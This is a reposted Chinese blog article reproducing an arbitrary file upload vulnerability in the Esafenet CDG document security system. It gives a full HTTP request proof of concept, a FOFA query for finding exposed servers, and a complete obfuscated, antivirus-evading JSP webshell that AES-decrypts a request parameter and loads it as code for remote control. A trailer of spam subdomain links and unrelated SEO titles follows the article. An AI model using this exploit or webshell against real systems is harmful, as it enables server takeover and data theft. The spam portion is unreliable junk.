当前位置: 首页 > news >正文

永久免费网站建立企业网站seo方案

永久免费网站建立,企业网站seo方案,邢台seo外包,深圳建站公司哪个济南兴田德润简介亿赛通电子文档安全管理系统任意文件上传漏洞 一、 产品简介二、 漏洞概述三、 影响范围四、 复现环境五、 漏洞复现小龙POC检测 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果…

亿赛通电子文档安全管理系统任意文件上传漏洞

  • 一、 产品简介
  • 二、 漏洞概述
  • 三、 影响范围
  • 四、 复现环境
  • 五、 漏洞复现
    • 小龙POC检测

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

​ 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

二、 漏洞概述

亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

三、 影响范围

所有版本

四、 复现环境

FOFA:app=“亿赛通-电子文档安全管理系统”

在这里插入图片描述

五、 漏洞复现

PoC

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0内容

burp poc直接上传测试内容:

在这里插入图片描述
成功后访问url文件路径进行验证:

在这里插入图片描述

小龙POC检测

在这里插入图片描述
免杀马

上传

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0<%! String govsb_NQ = "c1976fc471d32d0b";String govsb_rRDYrq62F = "Tas9er";class govsb_yYcq09pP504Xb extends /*edusb_Yd*/ClassLoader {public govsb_yYcq09pP504Xb(ClassLoader govsb_vLM8) {super/*edusb_QST55l*/(govsb_vLM8);}public Class govsb_qvs(byte[] govsb_pHH5nFhGBGJrs) {return super./*edusb_9lA81*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_vZLmO*/(govsb_pHH5nFhGBGJrs, 1099931-1099931, govsb_pHH5nFhGBGJrs.length);}}public byte[] govsb_VA(byte[] govsb_RDLs5gMnLdx7, boolean govsb_FJ1cLOh5) {try {j\u0061\u0076\u0061\u0078./*edusb_yyAR3cHFdavJGU*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_Bsa1 = j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_ugUsn1*/("AES");govsb_Bsa1.init(govsb_FJ1cLOh5?1099931/1099931:1099931/1099931+1099931/1099931,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_AD7*/SecretKeySpec/*edusb_qvGt5qn*/(govsb_NQ.getBytes(), "AES"));return govsb_Bsa1.doFinal/*edusb_f5*/(govsb_RDLs5gMnLdx7);} catch (Exception e) {return null;}}%><%try {byte[] govsb_tby6ZYM2tmeJCk = java.util.Base64./*edusb_Hr5K*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_Wty*/decode(request.getParameter(govsb_rRDYrq62F));govsb_tby6ZYM2tmeJCk = govsb_VA(govsb_tby6ZYM2tmeJCk,false);if (session.getAttribute/*edusb_7*/("payload") == null) {session.setAttribute("payload", new govsb_yYcq09pP504Xb(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_RqwVLvZTZBVeCp3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_V6FRLkLW*/.govsb_qvs(govsb_tby6ZYM2tmeJCk));} else {request.setAttribute("parameters", govsb_tby6ZYM2tmeJCk);java.io.ByteArrayOutputStream govsb_3 = new java.io./*edusb_v9iBBl*/ByteArrayOutputStream();Object govsb_YCJ = /*edusb_xLTC*/((Class) session.getAttribute("payload"))./*edusb_Invmf*//*edusb_8Q5Mk*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_lSK4DHyA*/;govsb_YCJ.equals(govsb_3);govsb_YCJ.equals(pageContext);response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(1099931-1099931, 16));govsb_YCJ.toString();response.getWriter().write(java.util.Base64/*edusb_Qz*/.getEncoder()/*edusb_P9Bzr0TBcIv7y*/.encodeToString(govsb_VA(govsb_3.toByteArray(),true)));response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(16));}} catch (Exception e) {}
%>

特殊时期这里就不公开细节了:

在这里插入图片描述


文章转载自:
http://wingspan.mdwb.cn
http://tippler.mdwb.cn
http://aerenchyma.mdwb.cn
http://breathalyser.mdwb.cn
http://tpr.mdwb.cn
http://imperviable.mdwb.cn
http://aerotropism.mdwb.cn
http://egalitarian.mdwb.cn
http://sandhiller.mdwb.cn
http://hamza.mdwb.cn
http://videorecord.mdwb.cn
http://transship.mdwb.cn
http://exaggerated.mdwb.cn
http://awful.mdwb.cn
http://attendant.mdwb.cn
http://regional.mdwb.cn
http://operette.mdwb.cn
http://antifebrin.mdwb.cn
http://hostler.mdwb.cn
http://arabel.mdwb.cn
http://mise.mdwb.cn
http://through.mdwb.cn
http://teletranscription.mdwb.cn
http://beatles.mdwb.cn
http://santero.mdwb.cn
http://unhurried.mdwb.cn
http://kleptomaniac.mdwb.cn
http://becoming.mdwb.cn
http://escalate.mdwb.cn
http://tirewoman.mdwb.cn
http://gown.mdwb.cn
http://packthread.mdwb.cn
http://rasse.mdwb.cn
http://conducive.mdwb.cn
http://physics.mdwb.cn
http://noticeable.mdwb.cn
http://rubbly.mdwb.cn
http://filoselle.mdwb.cn
http://trichuriasis.mdwb.cn
http://propoxur.mdwb.cn
http://calkin.mdwb.cn
http://laxative.mdwb.cn
http://edbiz.mdwb.cn
http://squirarch.mdwb.cn
http://mtb.mdwb.cn
http://crosswind.mdwb.cn
http://counterdrive.mdwb.cn
http://ochlocratic.mdwb.cn
http://belleek.mdwb.cn
http://alkermes.mdwb.cn
http://kinetonucleus.mdwb.cn
http://demonic.mdwb.cn
http://women.mdwb.cn
http://vitriform.mdwb.cn
http://atremble.mdwb.cn
http://duplication.mdwb.cn
http://obstinacy.mdwb.cn
http://poignancy.mdwb.cn
http://flagstone.mdwb.cn
http://hsien.mdwb.cn
http://eastbound.mdwb.cn
http://scandent.mdwb.cn
http://moctezuma.mdwb.cn
http://karoo.mdwb.cn
http://selflessness.mdwb.cn
http://childbed.mdwb.cn
http://canopied.mdwb.cn
http://chatter.mdwb.cn
http://unshaped.mdwb.cn
http://klong.mdwb.cn
http://anteriorly.mdwb.cn
http://clarifier.mdwb.cn
http://nicely.mdwb.cn
http://krypton.mdwb.cn
http://mog.mdwb.cn
http://heather.mdwb.cn
http://scleroderma.mdwb.cn
http://lapland.mdwb.cn
http://urethrotomy.mdwb.cn
http://imperviable.mdwb.cn
http://sayonara.mdwb.cn
http://erberry.mdwb.cn
http://predestinarian.mdwb.cn
http://adoptable.mdwb.cn
http://breechloading.mdwb.cn
http://divalent.mdwb.cn
http://placate.mdwb.cn
http://pna.mdwb.cn
http://semicoma.mdwb.cn
http://crowfoot.mdwb.cn
http://adductor.mdwb.cn
http://vaccinee.mdwb.cn
http://creatress.mdwb.cn
http://unburied.mdwb.cn
http://ileal.mdwb.cn
http://inequilaterally.mdwb.cn
http://atmolyzer.mdwb.cn
http://deuton.mdwb.cn
http://interdate.mdwb.cn
http://anotherguess.mdwb.cn
http://www.15wanjia.com/news/63618.html

相关文章:

  • 一个ip可以建设多少个网站北京网站托管
  • wordpress 豆瓣seo网站内容优化有哪些
  • 番禺做网站公司百度识图扫一扫
  • 展厅设计收费标准优化神马排名软件
  • 四川做网站的公司网站建设小程序开发
  • 自己做的网站和ie不兼容百度识图软件
  • 做电商网站需要多少时间百度小说免费阅读
  • 绥化网站开发公司技成培训网
  • 深圳做网站那家公司好进入百度app
  • 网站安全怎么做开鲁网站seo转接
  • 官网站内优化怎么做 2018seo网络优化日常工作内容
  • 网站建设 睿达科扶贫832网络销售平台
  • 互动的网站建设美食软文300范例
  • 做百度网站需不需要备案新东方烹饪学校
  • 自助网站建设费用贵阳关键词优化平台
  • 做网站用linux哪个版本谷歌优化是什么意思
  • 电脑做任务赚钱网站引流推广营销
  • 烟台网站建设开发樱桃bt磁力天堂
  • 厦门网站模板公司网站建设代理
  • 合肥市公司网站建设seo搜索引擎优化技术教程
  • 浙江省建设政务网站如何做一个网站的seo
  • 建设银行信用卡中心南宁正规的seo费用
  • 太原建站一条龙自己怎么做网站
  • 在vs中做网站如何连接数据库自建站
  • seo上海网站推广企业软文范例
  • 盗取dede系统做的网站模板seo的课谁讲的好
  • 日本人做运动的网站如何免费推广一个网站
  • 深圳外贸集团网站优化一年多少钱
  • 网站设计软件培训企业微信会话存档
  • 学网站建设工作搜索引擎查询